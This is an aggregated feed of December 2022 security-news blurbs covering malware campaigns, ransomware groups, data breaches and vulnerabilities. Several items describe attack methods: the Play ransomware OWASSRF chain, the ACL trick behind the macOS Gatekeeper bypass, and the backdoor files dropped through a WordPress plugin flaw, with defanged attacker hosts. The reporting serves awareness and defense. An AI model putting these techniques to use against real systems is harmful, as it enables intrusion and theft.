                Raspberry Robin worm attacks have been aimed at telecommunications and government office systems across Latin America, Australia, and Europe. Researchers from Trend Micro have uncovered a Raspberry Robin worm campaign targeting telecommunications and government office systems across Latin America, Australia, and Europe. The campaign has been active since at least September 2022; most of the infections have been observed in […]

                The post Raspberry Robin malware used in attacks against Telecom and Governments appeared first on Security Affairs.

                Autosummary: [Figure: Raspberry Robin infection routine (Source: Trend Micro)] The worm was attributed by IBM to the cybercrime gang Evil Corp; however, it is used by multiple threat actors to deliver malicious payloads such as the Clop ransomware.


                New info-stealer malware infects software pirates via fake cracks sites

                exploits
                2022-12-24 https://www.bleepingcomputer.com/news/security/new-info-stealer-malware-infects-software-pirates-via-fake-cracks-sites/
                A new information-stealing malware named "RisePro" is being distributed through fake cracks sites operated by the PrivateLoader pay-per-install (PPI) malware distribution service. [...]

                Autosummary: RisePro attempts to steal a wide variety of data from applications, browsers, crypto wallets, and browser extensions, as listed below. Web browsers: Google Chrome, Firefox, Maxthon3, K-Melon, Sputnik, Nichrome, Uran, Chromodo, Netbox, Comodo, Torch, Orbitum, QIP Surf, Coowon, CatalinaGroup Citrio, Chromium, Elements, Vivaldi, Chedot, CentBrowser, 7start, ChomePlus, Iridium, Amigo, Opera, Brave, CryptoTab, Yandex, IceDragon, BlackHaw, Pale Moon, Atom.


                Threat predictions for 2023: From hacktivism to cyberwar

                ciber
                2022-12-23 https://www.helpnetsecurity.com/2022/12/23/threat-predictions-2023/

                When it comes to 2023 threat predictions, Trellix anticipates spikes in geopolitically motivated attacks across Asia and Europe, hacktivism fueled by tensions from opposing political parties, and vulnerabilities in core software supply chains. “Analyzing current trends is necessary but being predictive in cybersecurity is vital. While organizations focus on near-term threats, we advise all to look beyond the horizon to ensure a proactive posture,” said John Fokker, Head of Threat Intelligence, Trellix. “Global political events … More

                The post Threat predictions for 2023: From hacktivism to cyberwar appeared first on Help Net Security.


                LastPass Admits to Severe Data Breach, Encrypted Password Vaults Stolen

                financial
                2022-12-23 https://thehackernews.com/2022/12/lastpass-admits-to-severe-data-breach.html
                The August 2022 security breach of LastPass may have been more severe than previously disclosed by the company. The popular password management service on Thursday revealed that malicious actors obtained a trove of personal information belonging to its customers that include their encrypted password vaults using data siphoned from the break-in. Also stolen is "basic customer account information "

                Autosummary: Also stolen is "basic customer account information and related metadata including company names, end-user names, billing addresses, email addresses, telephone numbers, and the IP addresses from which customers were accessing the LastPass service," the company said.


                Vice Society Ransomware Attackers Adopt Robust Encryption Methods

                exploits ransomware
                2022-12-23 https://thehackernews.com/2022/12/vice-society-ransomware-attackers-adopt.html
                The Vice Society ransomware actors have switched to yet another custom ransomware payload in their recent attacks aimed at a variety of sectors. "This ransomware variant, dubbed 'PolyVice,' implements a robust encryption scheme, using NTRUEncrypt and ChaCha20-Poly1305 algorithms," SentinelOne researcher Antonio Cocomazzi said in an analysis. Vice Society, which is tracked by Microsoft under the


                Researchers Warn of Kavach 2FA Phishing Attacks Targeting Indian Govt. Officials

                financial
                2022-12-23 https://thehackernews.com/2022/12/researchers-warn-of-kavach-2fa-phishing.html
                A new targeted phishing campaign has zoomed in on a two-factor authentication solution called Kavach that's used by Indian government officials. Cybersecurity firm Securonix dubbed the activity STEPPY#KAVACH, attributing it to a threat actor known as SideCopy based on tactical overlaps with prior attacks. ".LNK files are used to initiate code execution which eventually downloads and runs a

                Autosummary: The binary file, for its part, functions as a backdoor that enables the threat actor to execute commands sent from an attacker-controlled domain, fetch and run additional payloads, take screenshots, and exfiltrate files.


                Hackers exploit bug in WordPress gift card plugin with 50K installs

                exploits
                2022-12-23 https://www.bleepingcomputer.com/news/security/hackers-exploit-bug-in-wordpress-gift-card-plugin-with-50k-installs/
                Hackers are actively targeting a critical flaw in YITH WooCommerce Gift Cards Premium, a WordPress plugin used on over 50,000 websites. [...]

                Autosummary: The uploaded files spotted by Wordfence are the following:
                kon.php / 1tes.php – loads a copy of the “marijuana shell” file manager in memory from a remote location (shell[.]prinsh[.]com)
                b.php – simple uploader file
                admin.php – password-protected backdoor
                The analysts report that most attacks occurred in November before admins could patch the flaw, but a second peak was observed on December 14, 2022.


                The Week in Ransomware - December 23rd 2022 - Targeting Microsoft Exchange

                exploits ransomware
                2022-12-23 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-23rd-2022-targeting-microsoft-exchange/
                Reports this week illustrate how threat actors consider Microsoft Exchange as a prime target for gaining initial access to corporate networks to steal data and deploy ransomware. [...]

                Autosummary: Other reports this week shed light on various ransomware operations. Contributors and those who provided new ransomware information and stories this week include: @BleepinComputer, @FourOctets, @billtoulas, @DanielGallagher, @demonslay335, @struppigel, @jorntvdw, @LawrenceAbrams, @malwrhunterteam, @VK_Intel, @PolarToffee, @fwosar, @Ionut_Ilascu, @Seifreed, @malwareforme, @serghei, @IBMSecurity, @PRODAFT, @CrowdStrike, @LabsSentinel, @Fortinet, @zscaler, @TrendMicro, and @pcrisk. December 21st 2022: Royal ransomware may have been first observed by researchers around September 2022, but it has seasoned cybercriminals behind it: the threat actors running this ransomware (who used to be a part of Conti Team One, according to a mind map shared by Vitali Kremez) initially dubbed it Zeon ransomware, until they rebranded it to Royal ransomware.


                Smashing Security podcast #303: Secret Roomba snaps, Christmas cab scams, and the future of AI

                financial
                2022-12-22 https://grahamcluley.com/smashing-security-podcast-303/
                Beware your Roomba's roving eye, the Finns warn of AI threats around the corner, and watch out when hailing a cab in Dublin... All this and much more is discussed in the latest edition of the award-winning "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by The Register's Iain Thomson.


                Adversarial risk in the age of ransomware

                exploits ransomware
                2022-12-22 https://www.helpnetsecurity.com/2022/12/22/adversarial-risk-in-the-age-of-ransomware-video/

                Éireann Leverett, Technology and Risk Entrepreneur, makes the audience think about ransomware risks from more than one perspective, including the perspective of the threat actors. He also lays out the many interesting results of an analysis of a decade of known ransomware attacks and paid ransoms. This video was recorded at IRISSCON 2022, an annual conference organized by IRISSCERT. The all-day event focuses on providing attendees with an overview of the current cyber threats … More

                The post Adversarial risk in the age of ransomware appeared first on Help Net Security.


                Zerobot Botnet Emerges as a Growing Threat with New Exploits and Capabilities

                exploits
                2022-12-22 https://thehackernews.com/2022/12/zerobot-botnet-emerges-as-growing.html
                The Zerobot DDoS botnet has received substantial updates that expand on its ability to target more internet-connected devices and scale its network. Microsoft Threat Intelligence Center (MSTIC) is tracking the ongoing threat under the moniker DEV-1061, its designation for unknown, emerging, or developing activity clusters. Zerobot, first documented by Fortinet FortiGuard Labs earlier this month,


                FIN7 Cybercrime Syndicate Emerges as Major Player in Ransomware Landscape

                exploits ransomware
                2022-12-22 https://thehackernews.com/2022/12/fin7-cybercrime-syndicate-emerges-as.html
                An exhaustive analysis of FIN7 has unmasked the cybercrime syndicate's organizational hierarchy, alongside unraveling its role as an affiliate for mounting ransomware attacks. It has also exposed deeper associations between the group and the larger threat ecosystem comprising the now-defunct ransomware DarkSide, REvil, and LockBit families. The highly active threat group, also known as Carbanak,

                Autosummary: Other prominent countries include China, Germany, Canada, Italy, and the U.K. FIN7's intrusion techniques, over the years, have further diversified beyond traditional social engineering to include infected USB drives, software supply chain compromise and the use of stolen credentials purchased from underground markets.


                Critical Security Flaw Reported in Passwordstate Enterprise Password Manager

                government
                2022-12-22 https://thehackernews.com/2022/12/critical-security-flaw-reported-in.html
                Multiple high-severity vulnerabilities have been disclosed in Passwordstate password management solution that could be exploited by an unauthenticated remote adversary to obtain a user's plaintext passwords. "Successful exploitation allows an unauthenticated attacker to exfiltrate passwords from an instance, overwrite all stored passwords within the database, or elevate their privileges within


                Vice Society ransomware gang switches to new custom encryptor

                exploits ransomware
                2022-12-22 https://www.bleepingcomputer.com/news/security/vice-society-ransomware-gang-switches-to-new-custom-encryptor/
                The Vice Society ransomware operation has switched to using a custom ransomware encryptor that implements a strong, hybrid encryption scheme based on NTRUEncrypt and ChaCha20-Poly1305. [...]

                Autosummary: [Figure: Similarity between Chilly and PolyVice (Source: SentinelOne)] The differences lie in campaign-specific details like the file extension, ransom note name, hardcoded master key, wallpaper, etc., which supports the common vendor hypothesis.


                Get 40% off Malwarebytes Premium for the holidays

                exploits
                2022-12-22 https://www.bleepingcomputer.com/news/software/get-40-percent-off-malwarebytes-premium-for-the-holidays/
                Malwarebytes is running a holiday deal where you can get 40% off the Malwarebytes Premium antivirus software through the new year. [...]


                A new Zerobot variant spreads by exploiting Apache flaws

                exploits
                2022-12-22 https://securityaffairs.co/wordpress/139918/malware/zerobot-spreads-apache-flaws.html

                Microsoft spotted an upgraded variant of the Zerobot botnet that spreads by exploiting Apache vulnerabilities. Microsoft Threat Intelligence Center (MSTIC) researchers discovered a new variant of the Zerobot botnet (aka ZeroStresser) that was improved with the capabilities to target more Internet of Things (IoT) devices. The IT giant is tracking this cluster of threat activity […]

                The post A new Zerobot variant spreads by exploiting Apache flaws appeared first on Security Affairs.

                Autosummary: Zerobot was also observed spreading by exploiting dozens of vulnerabilities; version Zerobot 1.1 includes several new flaws, including the following:
                Vulnerability    Affected software
                CVE-2017-17105   Zivif PR115-204-P-RS
                CVE-2019-10655   Grandstream
                CVE-2020-25223   WebAdmin of Sophos SG UTM
                CVE-2021-42013   Apache
                CVE-2022-31137   Roxy-WI
                CVE-2022-33891   Apache Spark
                ZSL-2022-5717    MiniDVBLinux
                “Since the release of Zerobot 1.1, the malware operators have removed CVE-2018-12613, a phpMyAdmin vulnerability that could allow threat actors to view or execute files.


                Leading sports betting firm BetMGM discloses data breach

                financial
                2022-12-22 https://www.bleepingcomputer.com/news/security/leading-sports-betting-firm-betmgm-discloses-data-breach/
                Leading sports betting company BetMGM disclosed a data breach after a threat actor stole personal information belonging to an undisclosed number of customers. [...]

                Autosummary: While the personal info stolen in the attack varies for each customer, the attackers obtained a wide range of data, including names, contact info (like postal addresses, email addresses, and phone numbers), dates of birth, hashed Social Security numbers, account identifiers (like player IDs and screen names) and info related to transactions with BetMGM.


                Vice Society ransomware gang is using a custom locker

                exploits ransomware
                2022-12-22 https://securityaffairs.co/wordpress/139924/cyber-crime/vice-society-ransomware-custom-locker.html

                The Vice Society ransomware group has adopted new custom ransomware, with a strong encryption scheme, in recent intrusions. SentinelOne researchers discovered that the Vice Society ransomware gang has started using a custom ransomware that implements a robust encryption scheme, using NTRUEncrypt and ChaCha20-Poly1305 algorithms. Vice Society ransomware has been active since June 2021; it is considered […]

                The post Vice Society ransomware gang is using a custom locker appeared first on Security Affairs.

                Autosummary: Further investigation also revealed that the codebase for the Vice Society Windows payload has been used to build custom-branded payloads for other ransomware groups, such as “Chily” and “SunnyDay.” The new variant, dubbed “PolyVice”, was used in a recent attack and appended the file extension “.ViceSociety” to all encrypted files.


                Godfather Android banking malware is on the rise

                financial exploits
                2022-12-22 https://www.malwarebytes.com/blog/news/2022/12/godfather-android-banking-malware-is-on-the-rise

                Categories: Android, News
                Tags: Android, banking Trojan, Godfather, Anubis, lay-over screen, C&C, MYT, Google Protect

                Researchers have uncovered a new campaign of the Godfather banking Trojan that comes with some new tricks.

                The post Godfather Android banking malware is on the rise appeared first on Malwarebytes Labs.

                Autosummary: The most popular target apps for the banking Trojan are in the United States (49 companies), Turkey (31), Spain (30), Canada (22), France (20), Germany (19), and the United Kingdom (17). The Trojan checks the system language of the infected device and shuts down if it is one of these: Russian, Azerbaijani, Armenian, Belarusian, Kazakh, Kyrgyz, Moldovan, Uzbek, or Tajik.


                The Guardian hit by "ransomware attack"

                exploits
                2022-12-22 https://www.malwarebytes.com/blog/news/2022/12/the-guardian-hit-by-ransomware-attack

                Categories: News, Ransomware
                Tags: The Guardian, IT incident, internal network, ransomware

                Major news outlet The Guardian has suffered from an IT incident that it suspects is ransomware.

                The post The Guardian hit by "ransomware attack" appeared first on Malwarebytes Labs.

                Autosummary: To avoid falling victim, there are some basic precautions organizations can take:
                Install patches as soon as possible, especially for internet-facing devices
                Run an anti-virus/anti-malware solution that actively monitors and scans your systems
                Limit internet access to critical devices and systems where possible
                Ask the same prudence of your service providers
                Maintain offsite, offline backups and test that you can restore from them
                Train your staff so they have the information they need to be alert about phishing attempts and to use secure and unique passwords
                If and when we find out more about this attack, we will keep you posted here.


                CISO roles continue to expand beyond technical expertise

                ransomware
                2022-12-21 https://www.helpnetsecurity.com/2022/12/21/ciso-roles-continue-to-expand/

                Marlin Hawk has tracked and analyzed the profiles of 470 CISOs year-over-year to understand the changing dynamics in this critical leadership position. The research shows the CISO seat to be relatively industry-agnostic—with 84% of CISOs having a career history of working across multiple sectors—with today’s CISOs expected to bring more breadth of leadership to their role as they move away from being technical experts. “Today’s CISOs are taking up the mantle of responsibilities that have … More

                The post CISO roles continue to expand beyond technical expertise appeared first on Help Net Security.

                Autosummary: Larkin went on to say, “As the importance of information security has grown, boards of directors, regulators, and shareholders have demanded greater controls, better risk management as well as more people and departments focusing on defending a company and its assets. “Now candidates are being internally promoted to the role of CISO from IT Risk, Operational Risk Management, IT Audit, Technology Risk & Controls, among others,” Larkin added.


                GodFather Android malware targets 400 banks, crypto exchanges

                financial exploits
                2022-12-21 https://www.bleepingcomputer.com/news/security/godfather-android-malware-targets-400-banks-crypto-exchanges/
                An Android banking malware named "Godfather" has been targeting users in 16 countries, attempting to steal account credentials for over 400 online banking sites and cryptocurrency exchanges. [...]

                Autosummary: [Figure: Godfather targeting overview (Source: Group-IB)] Interestingly, the trojan is configured to check the system language, and if it's set to Russian, Azerbaijani, Armenian, Belarusian, Kazakh, Kyrgyz, Moldovan, Uzbek, or Tajik, it stops its operation. Almost half of all apps targeted by Godfather, 215, are banking apps, and most of them are in the United States (49), Turkey (31), Spain (30), Canada (22), France (20), Germany (19), and the UK (17).


                GodFather Android Banking Trojan Targeting Users of Over 400 Banking and Crypto Apps

                financial exploits
                2022-12-21 https://thehackernews.com/2022/12/godfather-android-banking-trojan.html
                An Android banking trojan known as GodFather is being used to target users of more than 400 banking and cryptocurrency apps spanning across 16 countries. This includes 215 banks, 94 crypto wallet providers, and 110 crypto exchange platforms serving users in the U.S., Turkey, Spain, Italy, Canada, and Canada, among others, Singapore-headquartered Group-IB said in a report shared with The Hacker

                Autosummary: This includes 215 banks, 94 crypto wallet providers, and 110 crypto exchange platforms serving users in the U.S., Turkey, Spain, Italy, Canada, and Canada, among others, Singapore-headquartered Group-IB said in a report shared with The Hacker News.


                Ransomware Hackers Using New Way to Bypass MS Exchange ProxyNotShell Mitigations

                exploits
                2022-12-21 https://thehackernews.com/2022/12/ransomware-hackers-using-new-way-to.html
                Threat actors affiliated with a ransomware strain known as Play are leveraging a never-before-seen exploit chain that bypasses blocking rules for ProxyNotShell flaws in Microsoft Exchange Server to achieve remote code execution (RCE) through Outlook Web Access (OWA). "The new exploit method bypasses URL rewrite mitigations for the Autodiscover endpoint," CrowdStrike researchers Brian Pitchford,


                Ukraine's DELTA Military System Users Under Attack from Info Stealing Malware

                exploits
                2022-12-21 https://thehackernews.com/2022/12/ukraines-delta-military-system-users.html
                The Computer Emergency Response Team of Ukraine (CERT-UA) this week disclosed that users of the Delta situational awareness program received phishing emails from a compromised email account belonging to the Ministry of Defense. The attacks, which have been attributed to a threat cluster dubbed UAC-0142, aimed to infect systems with two pieces of data-stealing malware referred to as FateGrab and


                German industrial giant ThyssenKrupp targeted in a new cyberattack

                industry ciber
                2022-12-21 https://securityaffairs.co/wordpress/139870/hacking/thyssenkrupp-targeted-cyberattack.html

                German multinational industrial engineering and steel production company ThyssenKrupp AG was the target of a cyberattack. German multinational industrial engineering and steel production giant ThyssenKrupp AG announced that the Materials Services division and corporate headquarters were hit by a cyberattack. At this time the company has yet to disclose the type of attack that hit […]

                The post German industrial giant ThyssenKrupp targeted in a new cyberattack appeared first on Security Affairs.

                Autosummary: “At the present time, no damage has been done, nor are there any indications that data has been stolen or modified.” This isn’t the first attack suffered by the company: in 2012, the company was targeted by another cyber attack that was classified as “heavy” and of “exceptional quality.”


                New Microsoft Exchange exploit chain lets ransomware attackers in (CVE-2022-41080)

                exploits ransomware
                2022-12-21 https://www.helpnetsecurity.com/2022/12/21/cve-2022-41080/

                Ransomware-wielding attackers are using a new exploit chain that includes one of the ProxyNotShell vulnerabilities (CVE-2022-41082) to achieve remote code execution on Microsoft Exchange servers. The ProxyNotShell exploit chain used CVE-2022-41040, an SSRF vulnerability in the Autodiscover endpoint of Microsoft Exchange, while this new one uses CVE-2022-41080 to achieve privilege escalation through Outlook Web Access (OWA). The exploit chain – dubbed OWASSRF by Crowdstrike researchers – can only be headed off by implementing the patches … More

                The post New Microsoft Exchange exploit chain lets ransomware attackers in (CVE-2022-41080) appeared first on Help Net Security.


                Raspberry Robin Worm Strikes Again, Targeting Telecom and Government Systems

                government
                2022-12-21 https://thehackernews.com/2022/12/raspberry-robin-worm-strikes-again.html
                The Raspberry Robin worm has been used in attacks against telecommunications and government office systems across Latin America, Australia, and Europe since at least September 2022. "The main payload itself is packed with more than 10 layers for obfuscation and is capable of delivering a fake payload once it detects sandboxing and security analytics tools," Trend Micro researcher Christopher So


                FBI warns of search engine ads pushing malware, phishing

                financial exploits
                2022-12-21 https://www.bleepingcomputer.com/news/security/fbi-warns-of-search-engine-ads-pushing-malware-phishing/
                The FBI warns that threat actors are using search engine advertisements to promote websites distributing ransomware or stealing login credentials for financial institutions and crypto exchanges. [...]

                Autosummary: "When a user searches for that business or service, these advertisements appear at the very top of search results with minimum distinction between an advertisement and an actual search result," warns the FBI.


                Corsair keyboard bug makes it type on its own, no malware involved

                exploits
                2022-12-21 https://www.bleepingcomputer.com/news/security/corsair-keyboard-bug-makes-it-type-on-its-own-no-malware-involved/
                Corsair has confirmed that a bug in the firmware of K100 keyboards, and not malware, is behind previously entered text being auto-typed into applications days later. [...]

                Autosummary: As first reported by Ars Technica, a Corsair spokesperson responded to concerns, saying that their keyboards do not have keylogging capabilities, nor do they actively monitor what users type on them.


                Zerobot malware now spreads by exploiting Apache vulnerabilities

                exploits
                2022-12-21 https://www.bleepingcomputer.com/news/security/zerobot-malware-now-spreads-by-exploiting-apache-vulnerabilities/
                The Zerobot botnet has been upgraded to infect new devices by exploiting security vulnerabilities affecting Internet-exposed and unpatched Apache servers. [...]

                Autosummary: It targets many system architectures and devices, including i386, AMD64, ARM, ARM64, MIPS, MIPS64, MIPS64le, MIPSle, PPC64, PPC64le, RISC64, and S390x.


                BEC scammers go after more than just money

                financial
                2022-12-21 https://www.malwarebytes.com/blog/news/2022/12/bec-scammers-go-after-more-than-just-money

                Categories: Business, News
                Tags: FBI, FDA, USDA, BEC, business email compromise, domain mimicry, spear phishing

                Business email compromise scammers are not just after money anymore; they will take truckloads of agricultural products as well.

                The post BEC scammers go after more than just money appeared first on Malwarebytes Labs.

                Autosummary: To be proactive, you should look for additional punctuation, changes in the top-level domain (e.g. “.com” vs “.gov”), added prefixes or suffixes, and the use of similar characters (e.g. “close” vs “c1ose”) or a minor misspelling of the domain. In a joint Cybersecurity Advisory (CSA), the Federal Bureau of Investigation (FBI), the Food and Drug Administration Office of Criminal Investigations (FDA OCI), and the US Department of Agriculture (USDA) recently observed incidents of Business Email Compromise (BEC) with a new twist.


                Play ransomware group claims to have stolen hotel chain data

                exploits ransomware
                2022-12-21 https://www.malwarebytes.com/blog/news/2022/12/play-ransomware-group-claims-to-have-stolen-h-hotel-data

                Categories: News
                Tags: H-Hotel, Play ransomware, ransomware, extortion, threat, breach, EDR

                A ransomware group claims to have stolen data from the H-Hotel chain, and is now threatening to leak it if the ransom is not paid.

                The post Play ransomware group claims to have stolen hotel chain data appeared first on Malwarebytes Labs.

                Autosummary: H-Hotels, a large hospitality chain with 60 hotels across several countries including Germany and Switzerland, has announced it has fallen victim to a ransomware attack. There is no indication how much data has been stolen, but the listing mentions “Private, personal data, clients documents, passports, ID, etc”.


                Play ransomware attacks use a new exploit to bypass ProxyNotShell mitigations on Exchange servers

                exploits ransomware
                2022-12-21 https://securityaffairs.co/wordpress/139897/cyber-crime/play-ransomware-bypass-proxynotshell-mitigation.html

                Play ransomware attacks target Exchange servers with a new exploit that bypasses Microsoft’s ProxyNotShell mitigations. Play ransomware operators target Exchange servers using a new exploit chain, dubbed OWASSRF by Crowdstrike, that bypasses Microsoft’s mitigations for ProxyNotShell vulnerabilities. The ProxyNotShell flaws are: they impact Exchange Server 2013, 2016, and 2019, an authenticated attacker can trigger them […]

                The post Play ransomware attacks use a new exploit to bypass ProxyNotShell mitigations on Exchange servers appeared first on Security Affairs.

                Autosummary: “– Installed Screen Connect, ID: b81d2f07c9163bf5, URL: instance-cmjrni-relay.screenconnect[.]com – Deployed Mimikatz. Crawled and saved their tools, you can access… pic.twitter.com/8vA3LNtpul” — Dray Agha (@Purp1eW0lf), December 14, 2022. The leaked tools included a Python script, poc.py, that, when executed, led CrowdStrike researchers to replicate the logs generated in recent Play ransomware attacks.


                Malicious PyPI package posed as SentinelOne SDK to serve info-stealing malware

                exploits
                2022-12-20 https://securityaffairs.co/wordpress/139831/cyber-crime/malicious-pypi-package-sentinelone-sdk.html

                Researchers spotted a malicious package in the Python Package Index (PyPI) repository that impersonates a software development kit (SDK) for SentinelOne. Cybersecurity researchers at ReversingLabs have discovered a new malicious package, named ‘SentinelOne,’ on the Python Package Index (PyPI) repository that impersonates a legitimate software development kit (SDK) for SentinelOne. The malicious package was first […]

                The post Malicious PyPI package posed as SentinelOne SDK to serve info-stealing malware appeared first on Security Affairs.

                Autosummary: The package claims to offer access to SentinelOne’s APIs, but it actually contains malicious code to harvest sensitive information from development systems, including credentials, configuration data, and SSH keys.


                Ransomware predictions for 2023

                exploits
                2022-12-20 https://www.helpnetsecurity.com/2022/12/20/ransomware-predictions-for-2023-video/

                In this Help Net Security video, Dave Trader, Field CISO at Presidio, talks about the evolution of ransomware attacks and outlines what we can expect in 2023. The lack of fundamental cybersecurity practices and controls, including critical vulnerability patching and employee cybersecurity training, undermines organizational attempts to improve ransomware defenses. A ransomware crisis leaves deep marks on all those affected. In fact, IT and security teams can be left in disarray long after the problem has … More

                The post Ransomware predictions for 2023 appeared first on Help Net Security.



                Microsoft Details Gatekeeper Bypass Vulnerability in Apple macOS Systems

                exploits
                2022-12-20 https://thehackernews.com/2022/12/microsoft-details-gatekeeper-bypass.html
                Microsoft has disclosed details of a now-patched security flaw in Apple macOS that could be exploited by an attacker to get around security protections imposed to prevent the execution of malicious applications. The shortcoming, dubbed Achilles (CVE-2022-42821, CVSS score: 5.5), was addressed by the iPhone maker in macOS Ventura 13, Monterey 12.6.2, and Big Sur 11.7.2, describing it as a logic


                Russian Hackers Targeted Petroleum Refinery in NATO Country During Ukraine War

                government
                2022-12-20 https://thehackernews.com/2022/12/russian-hackers-target-major-petroleum.html
                The Russia-linked Gamaredon group unsuccessfully attempted to break into a large petroleum refining company within a NATO member state earlier this year amid the ongoing Russo-Ukrainian war. The attack, which took place on August 30, 2022, is just one of multiple attacks orchestrated by the advanced persistent threat (APT) that's attributed to Russia's Federal Security Service (FSB). Gamaredon,


                Hackers bombard PyPi platform with information-stealing malware

                exploits
                2022-12-20 https://www.bleepingcomputer.com/news/security/hackers-bombard-pypi-platform-with-information-stealing-malware/
                The PyPi python package repository is being bombarded by a wave of information-stealing malware hiding inside malicious packages uploaded to the platform to steal software developers' data. [...]

                Autosummary: The malicious packages that contain these information stealers are: modulesecurity (114 downloads), informmodule (110 downloads), chazz (118 downloads), randomtime (118 downloads), proxygeneratorbil (91 downloads), easycordey (122 downloads), easycordeyy (103 downloads), tomproxies (150 downloads), sys-ej (186 downloads), py4sync (453 downloads), infosys (191 downloads), sysuptoer (186 downloads), nowsys (202 downloads), upamonkws (205 downloads), captchaboy (123 downloads), proxybooster (69 downloads). While these packages drop stealers that use different names, like Celestial Stealer, ANGEL stealer, Satan Stealer, @skid Stealer, and Leaf $tealer, Phylum has found that they are all based on the W4SP code.


                Raspberry Robin worm drops fake malware to confuse researchers

                exploits
                2022-12-20 https://www.bleepingcomputer.com/news/security/raspberry-robin-worm-drops-fake-malware-to-confuse-researchers/
                The Raspberry Robin malware is now trying its hand at some trickery by dropping a fake payload to confuse researchers and evade detection when it detects it's being run within sandboxes and debugging tools. [...]

                Autosummary: When the shortcut is executed, it abuses the legitimate "MSIExec.exe" Windows executable to download a malicious MSI installer that installs the Raspberry Robin payloads (figure: typical Raspberry Robin infection chain, Trend Micro). Double trouble: The malware is heavily obfuscated to hide its code from antivirus programs and security researchers, featuring multiple layers containing hard-coded values for decrypting the next one.


                Beware: Cybercriminals Launch New BrasDex Android Trojan Targeting Brazilian Banking Users

                financial exploits latam ciber
                2022-12-20 https://thehackernews.com/2022/12/beware-cybercriminals-launch-new.html
                The threat actors behind the Windows banking malware known as Casbaneiro have been identified as also being behind a novel Android trojan called BrasDex that has been observed targeting Brazilian users as part of an ongoing multi-platform campaign. BrasDex features a "complex keylogging system designed to abuse Accessibility Services to extract credentials specifically from a set of Brazilian targeted apps,

                Autosummary: Casbaneiro's features run the typical backdoor gamut that allows it to seize control of banking accounts, take screenshots, perform keylogging, hijack clipboard data, and even function as a clipper malware to hijack crypto transactions.


                Microsoft shares details for a Gatekeeper Bypass bug in Apple macOS

                exploits
                2022-12-20 https://securityaffairs.co/wordpress/139841/hacking/apple-gatekeeper-bypass.html

                Microsoft disclosed technical details of a vulnerability in Apple macOS that could be exploited by an attacker to bypass Gatekeeper. Microsoft has disclosed details of a now-fixed security vulnerability dubbed Achilles (CVE-2022-42821, CVSS score: 5.5) in Apple macOS that could be exploited by threat actors to bypass the Gatekeeper security feature. The Apple Gatekeeper is designed to protect […]

                The post Microsoft shares details for a Gatekeeper Bypass bug in Apple macOS appeared first on Security Affairs.

                Autosummary: The Achilles vulnerability relies on the Access Control Lists (ACLs) permission model to add extremely restrictive permissions to a downloaded file (i.e., “everyone deny write, writeattr, writeextattr, writesecurity, chown”), to block the Safari browser from setting the quarantine extended attribute.


                Ransomware gang uses new Microsoft Exchange exploit to breach servers

                exploits
                2022-12-20 https://www.bleepingcomputer.com/news/security/ransomware-gang-uses-new-microsoft-exchange-exploit-to-breach-servers/
                Play ransomware threat actors are using a new exploit chain that bypasses ProxyNotShell URL rewrite mitigations to gain remote code execution (RCE) on vulnerable servers through Outlook Web Access (OWA). [...]

                Autosummary: OWASSRF PoC exploit leaked online: While CrowdStrike security researchers were working on developing their own proof-of-concept (PoC) code to match the log info found while investigating these recent Play ransomware attacks, Huntress Labs threat researcher Dray Agha found and leaked a threat actor's tooling online, on December 14th.


                Malwarebytes earns AV-TEST Top Product awards for fourth consecutive quarter

                exploits
                2022-12-20 https://www.malwarebytes.com/blog/business/2022/12/malwarebytes-earns-av-test-top-product-awards-for-fourth-consecutive-quarter

                Categories: Business

                AV-TEST, a leading independent tester of cybersecurity solutions, has just ranked Malwarebytes as a Top Product for consumers and businesses for the fourth quarter in a row.

                The post Malwarebytes earns AV-TEST Top Product awards for fourth consecutive quarter appeared first on Malwarebytes Labs.

                Autosummary: For the Performance category, experts at the AV-TEST laboratory examined the effect security products had on performance, placing special attention to four categories: slowing-down when launching popular websites; slower download of frequently-used programs; slower launch of standard software programs; slower installation of frequently-used programs; slower copying of files (locally and in a network). Both Malwarebytes Premium and Malwarebytes Endpoint Protection scored 100% on the performance test for Sep-Oct 2022, by and large meeting or beating the industry average in each of the four categories. Learn more about what experts and customers are saying about Malwarebytes: Malwarebytes recognized as endpoint security leader by G2; MITRE ATT&CK® Evaluation results: Malwarebytes’ efficiency, delivered simply, earns high marks; Malwarebytes receives highest rankings in recent third-party tests; Malwarebytes outperforms competition in latest MRG Effitas assessment.


                Restaurant platform SevenRooms confirms data breach

                financial
                2022-12-20 https://www.malwarebytes.com/blog/news/2022/12/restaurant-platform-sevenrooms-confirms-fallout-from-third-party-vendor-data-breach

                Categories: News

                Tags: SevenRooms

                Tags: third party

                Tags: vendor

                Tags: breach

                Tags: data

                Tags: tool

                Tags: forum

                We take a look at reports confirmed by SevenRooms that a third party vendor breach may have impacted its customers.

                The post Restaurant platform SevenRooms confirms data breach appeared first on Malwarebytes Labs.

                Autosummary: The database, weighing in at 427GB, contained promo codes, payment reports, reservation lists and more, alongside folders named after well known restaurant chains.


                What happens once scammers receive funds from their victims

                financial
                2022-12-19 https://www.helpnetsecurity.com/2022/12/19/what-happens-once-scammers-receive-funds-from-their-victims-video/

                In this Help Net Security video, Ronnie Tokazowski, Principal Threat Advisor at Cofense, offers insight into the world’s most lucrative cybercrime – business email compromise (BEC). The Cofense team recently purchased $500 worth of trackable gift cards to intentionally give to scammers in the hopes of discovering what happens once scammers receive these funds, engaging with 54 live BEC attacks over 5 weeks. With gift cards continuing to be one of the more difficult cash-out … More

                The post What happens once scammers receive funds from their victims appeared first on Help Net Security.



                5 cybersecurity trends accelerating in 2023

                ciber
                2022-12-19 https://www.helpnetsecurity.com/2022/12/19/5-cybersecurity-trends-accelerating-in-2023/

                Netwrix has released key cybersecurity trends that will affect organizations of all sizes in 2023. Here are five specific trends that you need to be aware of: The business of cybercrime will be further professionalized The return of malware strains like Emotet, Conti and Trickbot indicates an expansion of cybercrime for hire. In particular, the growth of ransomware-as-a-service is enabling criminals without deep technical skills to make money, either by extorting a ransom for decryption … More

                The post 5 cybersecurity trends accelerating in 2023 appeared first on Help Net Security.

                Autosummary: To overcome this challenge, organizations will rely more on their trusted security partners, such as channel partners, system integrators, MSPs and MSSPs.


                New Agenda Ransomware Variant, Written in Rust, Aiming at Critical Infrastructure

                exploits ransomware
                2022-12-19 https://thehackernews.com/2022/12/new-agenda-ransomware-variant-written.html
